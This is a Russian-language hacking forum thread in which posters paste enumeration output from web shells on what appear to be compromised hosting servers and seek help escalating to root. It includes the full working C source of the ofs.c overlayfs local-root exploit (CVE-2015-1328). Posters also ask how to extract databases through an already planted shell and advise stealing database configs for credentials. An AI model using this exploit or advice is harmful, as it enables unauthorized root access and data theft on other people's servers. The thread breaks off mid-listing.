1.8T 48G 1.7T 3% /opt $ cat /etc/issue 2>&1 Code: Ubuntu 14.04.1 LTS \n \l $ cat /etc/crontab 2>&1 Code: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # # ClamAV refresh virus databases 30 1 * * * root freshclam >/dev/null 2>&1 # ClamAV checking vhosts directory and sending email to admins 0 2 * * * root /adm/clamav.sh >/dev/null 2>&1 $ ls -la /etc/cron.d 2>&1 Code: total 44 drwxr-xr-x 2 root root 4096 Apr 21 08:16 . drwxr-xr-x 144 root root 12288 Jul 31 17:59 .. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder -rw------- 1 root root 260 Jul 11 2014 awstats -rw-r--r-- 1 root root 1566 Feb 3 2014 mailman -rw-r--r-- 1 root root 589 Feb 28 2014 mdadm -rw-r--r-- 1 root root 510 Jul 7 2014 php5 -rw-r--r-- 1 root root 110 Jul 11 2014 plesk-backup-manager-task -rw-r--r-- 1 root root 156 Aug 7 2014 plesk-outgoing-mail-statistics-poller $ ls -la /etc/cron.hourly 2>&1 Code: total 20 drwxr-xr-x 2 root root 4096 Jun 24 2014 . drwxr-xr-x 144 root root 12288 Jul 31 17:59 .. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder $ ls -la /etc/cron.monthly 2>&1 Code: total 24 drwxr-xr-x 2 root root 4096 Jul 11 2014 . drwxr-xr-x 144 root root 12288 Jul 31 17:59 .. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder -rwxr-xr-x 1 root root 190 Jun 25 2014 50plesk-monthly $ ls -la /etc/cron.weekly 2>&1 Code: total 40 drwxr-xr-x 2 root root 4096 Jul 11 2014 . drwxr-xr-x 144 root root 12288 Jul 31 17:59 .. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder -rwxr-xr-x 1 root root 189 Jun 25 2014 50plesk-weekly -rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index -rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim -rwxr-xr-x 1 root root 771 Apr 10 2014 man-db -rwxr-xr-x 1 root root 211 Apr 10 2014 update-notifier-common $ cat /proc/version 2>&1 Code: Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 $ cat /proc/sys/vm/mmap_min_addr 2>&1 Code: 65536 $ ls -la /usr/bin/staprun 2>&1 Code: ls: cannot access /usr/bin/staprun: No such file or directory $ pwd 2>&1 Code: /opt/www/vhosts/hostname.domain/logs
Code: /* # Exploit Title: ofs.c - overlayfs local root in ubuntu # Date: 2015-06-15 # Exploit Author: rebel # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* CVE-2015-1328 / ofs.c overlayfs incorrect permission handling + FS_USERNS_MOUNT user@ubuntu-server-1504:~$ uname -a Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu-server-1504:~$ gcc ofs.c -o ofs user@ubuntu-server-1504:~$ id uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev) user@ubuntu-server-1504:~$ ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user) greets to beist & kaliman 2015-05-24 %rebel% *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <sys/types.h> #include <signal.h> #include <fcntl.h> #include <string.h> #include <linux/sched.h> #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" static char child_stack[1024*1024]; static int child_exec(void *stuff) { char *file; system("rm -rf /tmp/ns_sploit"); mkdir("/tmp/ns_sploit", 0777); mkdir("/tmp/ns_sploit/work", 0777); mkdir("/tmp/ns_sploit/upper",0777); mkdir("/tmp/ns_sploit/o",0777); fprintf(stderr,"mount #1\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); exit(-1); } file = ".access"; chmod("/tmp/ns_sploit/work/work",0777); } else file = "ns_last_pid"; chdir("/tmp/ns_sploit/o"); rename(file,"ld.so.preload"); chdir("/"); umount("/tmp/ns_sploit/o"); fprintf(stderr,"mount #2\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { exit(-1); } chmod("/tmp/ns_sploit/work/work",0777); } chmod("/tmp/ns_sploit/o/ld.so.preload",0777); umount("/tmp/ns_sploit/o"); } int main(int argc, char **argv) { int status, fd, lib; pid_t wrapper, init; int clone_flags = CLONE_NEWNS | SIGCHLD; fprintf(stderr,"spawning threads\n"); if((wrapper = fork()) == 0) { if(unshare(CLONE_NEWUSER) != 0) fprintf(stderr, "failed to create new user namespace\n"); if((init = fork()) == 0) { pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); if(pid < 0) { fprintf(stderr, "failed to create new mount namespace\n"); exit(-1); } waitpid(pid, &status, 0); } waitpid(init, &status, 0); return 0; } usleep(300000); wait(NULL); fprintf(stderr,"child threads done\n"); fd = open("/etc/ld.so.preload",O_WRONLY); if(fd == -1) { fprintf(stderr,"exploit failed\n"); exit(-1); } fprintf(stderr,"/etc/ld.so.preload created\n"); fprintf(stderr,"creating shared library\n"); lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); write(lib,LIB,strlen(LIB)); close(lib); lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); if(lib != 0) { fprintf(stderr,"couldn't create dynamic library\n"); exit(-1); } write(fd,"/tmp/ofs-lib.so\n",16); close(fd); system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); execl("/bin/su","su",NULL); }
uname -a Code: Linux vh16.hosting.ua 2.6.18-371.3.1.el5PAE #1 SMP Thu Dec 5 13:29:20 EST 2013 i 686 i686 i386 GNU/Linux ls -la /boot Code: total 39154 drwxr-xr-x 5 root root 5120 Apr 8 13:07 . drwxr-xr-x 28 root root 4096 Aug 10 03:00 .. -rw-r--r-- 1 root root 163 Jan 6 2011 .vmlinuz-2.6.18-194.32.1.el5.hmac -rw-r--r-- 1 root root 158 Apr 2 2010 .vmlinuz-2.6.18-194.el5.hmac -rw-r--r-- 1 root root 166 Sep 26 2013 .vmlinuz-2.6.18-348.18.1.el5PAE.hma c -rw-r--r-- 1 root root 165 Dec 5 2013 .vmlinuz-2.6.18-371.3.1.el5PAE.hmac -rw-r--r-- 1 root root 165 Jun 11 2014 .vmlinuz-2.6.18-371.9.1.el5PAE.hmac -rw-r--r-- 1 root root 161 Sep 17 2014 .vmlinuz-2.6.18-398.el5PAE.hmac -rw-r--r-- 1 root root 161 Apr 7 20:53 .vmlinuz-2.6.18-404.el5PAE.hmac -rw-r--r-- 1 root root 971511 Jan 6 2011 System.map-2.6.18-194.32.1.el5 -rw-r--r-- 1 root root 967675 Apr 2 2010 System.map-2.6.18-194.el5 -rw-r--r-- 1 root root 993118 Sep 26 2013 System.map-2.6.18-348.18.1.el5PAE -rw-r--r-- 1 root root 993780 Dec 5 2013 System.map-2.6.18-371.3.1.el5PAE -rw-r--r-- 1 root root 993835 Jun 11 2014 System.map-2.6.18-371.9.1.el5PAE -rw-r--r-- 1 root root 993998 Sep 17 2014 System.map-2.6.18-398.el5PAE -rw-r--r-- 1 root root 994152 Apr 7 20:53 System.map-2.6.18-404.el5PAE -rw-r--r-- 1 root root 69598 Jan 6 2011 config-2.6.18-194.32.1.el5 -rw-r--r-- 1 root root 69593 Apr 2 2010 config-2.6.18-194.el5 -rw-r--r-- 1 root root 70337 Sep 26 2013 config-2.6.18-348.18.1.el5PAE -rw-r--r-- 1 root root 70357 Dec 5 2013 config-2.6.18-371.3.1.el5PAE -rw-r--r-- 1 root root 70357 Jun 11 2014 config-2.6.18-371.9.1.el5PAE -rw-r--r-- 1 root root 70353 Sep 17 2014 config-2.6.18-398.el5PAE -rw-r--r-- 1 root root 70353 Apr 7 20:53 config-2.6.18-404.el5PAE drwxr-xr-x 2 root root 1024 May 4 2010 extlinux drwxr-xr-x 2 root root 1024 Apr 8 13:07 grub -rw------- 1 root root 2599913 Jan 25 2011 initrd-2.6.18-194.32.1.el5.img -rw------- 1 root root 2569559 Jan 25 2011 initrd-2.6.18-194.el5.img -rw------- 1 root root 2615526 Oct 14 2013 initrd-2.6.18-348.18.1.el5PAE.img -rw------- 1 root root 2615834 Jan 24 2014 initrd-2.6.18-371.3.1.el5PAE.img -rw------- 1 root root 2616679 Jun 12 2014 initrd-2.6.18-371.9.1.el5PAE.img -rw------- 1 root root 2616919 Dec 2 2014 initrd-2.6.18-398.el5PAE.img -rw------- 1 root root 2616967 Apr 8 13:07 initrd-2.6.18-404.el5PAE.img drwx------ 2 root root 12288 Jan 1 2009 lost+found -rw-r--r-- 1 root root 80032 Mar 12 2009 message -rw-r--r-- 1 root root 111346 Jan 6 2011 symvers-2.6.18-194.32.1.el5.gz -rw-r--r-- 1 root root 110979 Apr 2 2010 symvers-2.6.18-194.el5.gz -rw-r--r-- 1 root root 117369 Sep 26 2013 symvers-2.6.18-348.18.1.el5PAE.gz -rw-r--r-- 1 root root 117471 Dec 5 2013 symvers-2.6.18-371.3.1.el5PAE.gz -rw-r--r-- 1 root root 117487 Jun 11 2014 symvers-2.6.18-371.9.1.el5PAE.gz -rw-r--r-- 1 root root 117549 Sep 17 2014 symvers-2.6.18-398.el5PAE.gz -rw-r--r-- 1 root root 117561 Apr 7 20:53 symvers-2.6.18-404.el5PAE.gz -rw-r--r-- 1 root root 1877108 Jan 6 2011 vmlinuz-2.6.18-194.32.1.el5 -rw-r--r-- 1 root root 1875796 Apr 2 2010 vmlinuz-2.6.18-194.el5 -rw-r--r-- 1 root root 1908212 Sep 26 2013 vmlinuz-2.6.18-348.18.1.el5PAE -rw-r--r-- 1 root root 1909108 Dec 5 2013 vmlinuz-2.6.18-371.3.1.el5PAE -rw-r--r-- 1 root root 1909140 Jun 11 2014 vmlinuz-2.6.18-371.9.1.el5PAE -rw-r--r-- 1 root root 1910164 Sep 17 2014 vmlinuz-2.6.18-398.el5PAE -rw-r--r-- 1 root root 1910324 Apr 7 20:53 vmlinuz-2.6.18-404.el5PAE mount Code: /dev/md3 on / type ext3 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/md4 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime) /dev/md2 on /boot type ext3 (rw) /dev/md1 on /var type ext3 (rw,noatime) /dev/md0 on /hsphere type ext3 (rw,noatime,usrquota,data=writeback) tmpfs on /dev/shm type tmpfs (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) df -h Code: Filesystem Size Used Avail Use% Mounted on /dev/md3 15G 6.8G 7.1G 49% / /dev/md4 4.9G 2.6G 2.1G 56% /tmp /dev/md2 198M 46M 143M 25% /boot /dev/md1 436G 21G 393G 6% /var /dev/md0 417G 135G 260G 35% /hsphere tmpfs 5.9G 0 5.9G 0% /dev/shm cat /etc/issue Code: CentOS release 5.5 (Final Kernel \r on an \m cat /proc/version Code: Linux version 2.6.18-371.3.1.el5PAE ([email protected]) (gcc versio n 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Thu Dec 5 13:29:20 EST 2013 cat /proc/sys/vm/mmap_min_addr 4096 Использую этот эксполит https://www.exploit-db.com/exploits/10613/ Но при его копиляции пишет что недостаточно прав gcc, можно это обойти ?gcc установлены права 750 И вопрос ,я правельный экполит выбрал?? Ешё только учусь.
1. Вы используете ядерный сплойт для 2009 года, а какого года ваша сборка? 0_o 2. Нет прав на gcc, компилируйте сплойт на локальной машине. 3. Что-то ядерное под вашу машину вряд ли есть, посмотрите/попробуйте http://www.openwall.com/lists/oss-security/2015/07/23/16
Ребят подскажите пожалуйста ,чисто случайно наткнулся на уже залитый шел на сайте Но он не дает ни заливать файлы ,ни читать http://hkar.ru/D5S3 http://hkar.ru/D5S4 Code: Linux ns5.hiwit.net 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux total 34093 drwxr-xr-x 3 root root 400 Aug 11 04:52 . drwxr-xr-x 24 root root 640 Aug 11 04:52 .. -rw------- 1 root root 3391819 Jul 29 14:35 System.map-3.13.0-61-generic -rw-r--r-- 1 root root 1165129 Jul 29 14:35 abi-3.13.0-61-generic -rw-r--r-- 1 root root 165763 Jul 29 14:35 config-3.13.0-61-generic drwxr-xr-x 2 root root 472 Aug 11 04:52 grub -rw-r--r-- 1 root root 23777827 Aug 11 04:41 initrd.img-3.13.0-61-generic -rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin -rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf -rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin -rw------- 1 root root 5822208 Jul 29 14:35 vmlinuz-3.13.0-61-generic При команде lls -la --full-time /lib (64) тишина /dev/sda1 on / type reiserfs (rw,relatime,notail) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/cgroup type tmpfs (rw) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) udev on /dev type devtmpfs (rw,mode=0755) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) none on /run/shm type tmpfs (rw,nosuid,nodev) none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755) none on /sys/fs/pstore type pstore (rw) /dev/sda2 on /home type reiserfs (rw,relatime) systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd) Filesystem Size Used Avail Use% Mounted on /dev/sda1 9.4G 4.4G 5.0G 47% / none 4.0K 0 4.0K 0% /sys/fs/cgroup udev 3.9G 12K 3.9G 1% /dev tmpfs 799M 496K 798M 1% /run none 5.0M 0 5.0M 0% /run/lock none 3.9G 0 3.9G 0% /run/shm none 100M 0 100M 0% /run/user /dev/sda2 141G 51G 90G 37% /home Ubuntu 14.04.3 LTS \n \l # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # ls -la cron.d, cron.hourly, cron.monthly, cron.weekly ничего не выводит Linux version 3.13.0-61-generic (buildd@lgw01-50) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 65536 /home/ah42713/web/www ls -la /usr/bin/staprun ничего не выводит find / -type f -perm -u+s -exec ls -la {} ; 2>/dev/null тишина Тут даже больше вопрос ,как вытащить базу , а уже потом по рутать по возможности
По пробуй скачать конфиги (config.php, conn.php и так далее) базы,потом через шел зайти или myadmin найти что врятли получиться.
Везде упоминают о каком-то старом баге, который позволял эскалировать привилегии в Active directory, о чем может идти речь?
Есть root доступ в mysql и такой серв Code: :/var/www/user/data $ uname -a Linux usertoys.com.ua 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux :/var/www/user/data $ ls -la /boot total 15161 drwxr-xr-x 4 root root 1024 May 12 13:06 . drwxr-xr-x 23 root root 4096 Jul 30 06:32 .. -rw-r--r-- 1 root root 2114623 Apr 25 03:31 System.map-3.2.0-4-amd64 -rw-r--r-- 1 root root 129281 Apr 25 03:31 config-3.2.0-4-amd64 drwxr-xr-x 3 root root 5120 May 12 13:07 grub -rw-r--r-- 1 root root 10347571 May 12 13:06 initrd.img-3.2.0-4-amd64 drwxr-xr-x 2 root root 12288 May 12 13:01 lost+found -rw-r--r-- 1 root root 2842400 Apr 25 03:22 vmlinuz-3.2.0-4-amd64 :/var/www/user/data $ ls -la --full-time /lib total 264 drwxr-xr-x 13 root root 4096 2015-05-16 00:32:27.064340794 +0300 . drwxr-xr-x 23 root root 4096 2015-07-30 06:32:55.250270001 +0300 .. lrwxrwxrwx 1 root root 21 2015-05-16 00:32:27.052340698 +0300 cpp -> /etc/alternatives/cpp drwxr-xr-x 2 root root 4096 2015-05-12 13:05:25.243433001 +0300 discover drwxr-xr-x 7 root root 4096 2015-05-12 13:03:48.463433001 +0300 firmware drwxr-xr-x 2 root root 4096 2015-05-12 13:03:13.543433001 +0300 init -rwxr-xr-x 1 root root 72184 2012-11-12 18:58:05.000000000 +0200 klibc-2xtYrByCrj5OEwaInv4tMSjej98.so lrwxrwxrwx 1 root root 17 2013-03-01 15:55:02.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0 -rw-r--r-- 1 root root 31384 2013-03-01 15:55:04.000000000 +0200 libip4tc.so.0.1.0 lrwxrwxrwx 1 root root 17 2013-03-01 15:55:02.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0 -rw-r--r-- 1 root root 31448 2013-03-01 15:55:04.000000000 +0200 libip6tc.so.0.1.0 lrwxrwxrwx 1 root root 15 2013-03-01 15:55:02.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0 -rw-r--r-- 1 root root 10544 2013-03-01 15:55:04.000000000 +0200 libipq.so.0.0.0 lrwxrwxrwx 1 root root 16 2013-03-01 15:55:02.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0 -rw-r--r-- 1 root root 5928 2013-03-01 15:55:04.000000000 +0200 libiptc.so.0.0.0 lrwxrwxrwx 1 root root 19 2013-03-01 15:55:02.000000000 +0200 libxtables.so.7 -> libxtables.so.7.0.0 -rw-r--r-- 1 root root 47824 2013-03-01 15:55:04.000000000 +0200 libxtables.so.7.0.0 drwxr-xr-x 3 root root 4096 2015-05-12 13:03:13.911433001 +0300 lsb drwxr-xr-x 2 root root 4096 2015-05-12 13:03:25.155433001 +0300 modprobe.d drwxr-xr-x 3 root root 4096 2015-05-12 13:03:59.007433001 +0300 modules drwxr-xr-x 3 root root 4096 2015-05-12 13:03:27.079433001 +0300 systemd drwxr-xr-x 15 root root 4096 2015-05-12 13:03:06.719433001 +0300 terminfo drwxr-xr-x 5 root root 4096 2015-05-12 13:03:27.463433001 +0300 udev drwxr-xr-x 4 root root 12288 2015-05-29 10:37:18.893494371 +0300 x86_64-linux-gnu drwxr-xr-x 2 root root 4096 2015-05-12 13:03:24.923433001 +0300 xtables :/var/www/user/data $ mount sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=746519,mode=755) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000) tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=598420k,mode=755) /dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 on / type ext4 (rw,relatime,errors=remount-ro,user_xattr,barrier=1,data=ordered,usrquota,grpquota) tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) tmpfs on /run/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1301280k) /dev/vda1 on /boot type ext2 (rw,relatime,errors=continue) rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw,relatime) :/var/www/user/data $ df -h Filesystem Size Used Avail Use% Mounted on rootfs 58G 26G 29G 48% / udev 10M 0 10M 0% /dev tmpfs 585M 232K 585M 1% /run /dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 58G 26G 29G 48% / tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 1.3G 0 1.3G 0% /run/shm /dev/vda1 89M 17M 67M 21% /boot :/var/www/user/data $ cat /etc/issue Debian GNU/Linux 7 \n \l :/var/www/user/data $ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # :/var/www/user/data $ ls -la /etc/cron.d total 20 drwxr-xr-x 2 root root 4096 Jun 15 13:23 . drwxr-xr-x 93 root root 4096 Aug 28 09:27 .. -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder -rw-r--r-- 1 root root 254 Jun 13 2012 awstats -rw-r--r-- 1 root root 510 Mar 25 10:47 php5 :/var/www/user/data $ ls -la /etc/cron.hourly total 12 drwxr-xr-x 2 root root 4096 May 12 13:03 . drwxr-xr-x 93 root root 4096 Aug 28 09:27 .. -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder :/var/www/user/data $ la -la /etc/cron.monthly sh: 1: la: not found :/var/www/user/data $ la -la /etc/cron.weekly sh: 1: la: not found :/var/www/user/data $ cat /etc/cron.hourly/* cat: /etc/cron.hourly/*: No such file or directory :/var/www/user/data $ cat /etc/cron.monthly/* cat: /etc/cron.monthly/*: No such file or directory :/var/www/user/data $ cat /etc/cron.weekly/* #!/bin/sh # # man-db cron weekly set -e iosched_idle= # Don't try to change I/O priority in a vserver or OpenVZ. if ! egrep -q '(envID|VxID):.*[1-9]' /proc/self/status && \ ([ ! -d /proc/vz ] || [ -d /proc/bc ]); then dpkg_version="$(dpkg-query -W -f '${Version}' dpkg 2>/dev/null)" if dpkg --compare-versions "$dpkg_version" ge 1.15.0; then iosched_idle='--iosched idle' fi fi if ! [ -d /var/cache/man ]; then # Recover from deletion, per FHS. mkdir -p /var/cache/man chown man:root /var/cache/man || true chmod 2755 /var/cache/man fi # regenerate man database if [ -x /usr/bin/mandb ]; then # --pidfile /dev/null so it always starts; mandb isn't really a daemon, # but we want to start it like one. start-stop-daemon --start --pidfile /dev/null \ --startas /usr/bin/mandb --oknodo --chuid man \ $iosched_idle \ -- --quiet fi exit 0 #!/bin/sh RKHUNTER=/usr/bin/rkhunter test -x $RKHUNTER || exit 0 # source our config . /etc/default/rkhunter case "$CRON_DB_UPDATE" in [YyTt]*) if [ ! -x /usr/bin/wget ] && [ ! -x /usr/bin/curl ] && [ ! -x /usr/bin/links ] && \ [ ! -x /usr/bin/elinks ] && [ ! -x /usr/bin/lynx ]; then echo "No tool with which to download rkhunter updates was found on your system. Please install wget, curl, (e)links or lynx" exit 1 fi OUTFILE=`mktemp` || exit 1 case "$DB_UPDATE_EMAIL" in [YyTt]*) ( echo "Subject: [rkhunter] $(hostname -f) - Weekly database update" echo "To: $REPORT_EMAIL" echo "" $RKHUNTER --versioncheck --nocolors --appendlog $RKHUNTER --update --nocolors --appendlog ) | /usr/sbin/sendmail $REPORT_EMAIL ;; *) $RKHUNTER --versioncheck --appendlog 1>/dev/null 2>$OUTFILE $RKHUNTER --update --appendlog 1>/dev/null 2>>$OUTFILE ;; esac if [ -s "$OUTFILE" ]; then ( echo "Subject: [rkhunter] $(hostname -f) - Weekly rkhunter database update" echo "To: $REPORT_EMAIL" echo "" cat $OUTFILE ) | /usr/sbin/sendmail $REPORT_EMAIL fi rm -f $OUTFILE ;; *) exit 0 ;; esac :/var/www/user/data $ cat /proc/version Linux version 3.2.0-4-amd64 ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.68-1+deb7u1 :/var/www/user/data $ cat /proc/sys/vm/mmap_min_addr 65536 :/var/www/user/data $ pwd /var/www/user/data :/var/www/user/data $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null :/var/www/user/data $ id uid=500(user) gid=500(user) groups=500(user),1000(mgrsecure) :/var/www/user/data $ пробовал читать файлы из mysql но много не прочитал select load_file(''); И из эксплоитов пробовал, (чекер показал) - Kernel ia32syscall Emulation Privilege Escalation Language=c - Sendpage Local Privilege Escalation Language=ruby** - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Language=c - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit Language=c - open-time Capability file_ns_capable() Privilege Escalation Language=c - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability Language=c
Такие дела.пробывал связку. Но меня послало. Code: $ uname -a Linux fortuna.timeweb.ru 3.10.82-timeweb #1 SMP Fri Jul 3 10:11:34 MSK 2015 x86_64 x86_64 x86_64 GNU/Linux $ ls -la /boot total 153444 drwxr-xr-x 3 root root 4096 Oct 8 06:28 . drwxr-xr-x 28 root root 4096 Jul 21 06:26 .. -rw-r--r-- 1 root root 3210565 Aug 26 2014 System.map-3.10.53-timeweb -rw-r--r-- 1 root root 3210844 Oct 16 2014 System.map-3.10.58-timeweb -rw-r--r-- 1 root root 3213729 Mar 3 2015 System.map-3.10.70-timeweb -rw-r--r-- 1 root root 3213988 Jul 3 10:49 System.map-3.10.82-timeweb -rw-r--r-- 1 root root 3214012 Oct 7 13:05 System.map-3.10.90-timeweb -rw-r--r-- 1 root root 2911687 May 20 2013 System.map-3.2.45-timeweb -rw-r--r-- 1 root root 132942 Aug 26 2014 config-3.10.53-timeweb -rw-r--r-- 1 root root 133622 Oct 16 2014 config-3.10.58-timeweb -rw-r--r-- 1 root root 134094 Mar 3 2015 config-3.10.70-timeweb -rw-r--r-- 1 root root 134094 Jul 3 10:00 config-3.10.82-timeweb -rw-r--r-- 1 root root 134094 Oct 7 12:17 config-3.10.90-timeweb -rw-r--r-- 1 root root 129458 May 20 2013 config-3.2.45-timeweb drwxr-xr-x 3 root root 12288 Oct 8 06:28 grub -rw-r--r-- 1 root root 16856878 Sep 16 2014 initrd.img-3.10.53-timeweb -rw-r--r-- 1 root root 17273047 Feb 18 2015 initrd.img-3.10.58-timeweb -rw-r--r-- 1 root root 17273539 Mar 18 2015 initrd.img-3.10.70-timeweb -rw-r--r-- 1 root root 17273177 Sep 29 06:25 initrd.img-3.10.82-timeweb -rw-r--r-- 1 root root 17272293 Oct 8 06:28 initrd.img-3.10.90-timeweb -rw-r--r-- 1 root root 15767803 Sep 18 2013 initrd.img-3.2.45-timeweb -rw-r--r-- 1 root root 176764 Nov 27 2011 memtest86+.bin -rw-r--r-- 1 root root 178944 Nov 27 2011 memtest86+_multiboot.bin -rw-r--r-- 1 root root 5939488 Aug 26 2014 vmlinuz-3.10.53-timeweb -rw-r--r-- 1 root root 5941120 